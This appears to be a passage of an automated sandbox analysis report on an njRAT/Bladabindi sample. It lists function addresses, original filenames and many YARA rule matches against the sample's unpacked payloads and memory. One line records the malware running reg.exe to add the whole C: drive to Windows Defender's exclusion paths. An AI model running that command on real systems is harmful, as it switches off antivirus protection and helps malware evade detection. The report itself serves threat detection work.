Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_07979AAF 16_2_07979AAF
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_0797DA47 16_2_0797DA47
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_079BBCC0 16_2_079BBCC0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_079B3BE0 16_2_079B3BE0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_079B5ADF 16_2_079B5ADF
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_079B5AF0 16_2_079B5AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FF8876A54FA 17_2_00007FF8876A54FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FF8877730E9 17_2_00007FF8877730E9
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_00B7CEB7 20_2_00B7CEB7
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_00B70EC0 20_2_00B70EC0
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_00B73C40 20_2_00B73C40
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_00B70EA4 20_2_00B70EA4
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_00B71600 20_2_00B71600
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_00B715B3 20_2_00B715B3
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamejoinerStub.exe6 vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewebhooker2.exe6 vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000002.1503477314.000000001F18A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamejoinerStub.exe6 vs virus.exe.bin.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
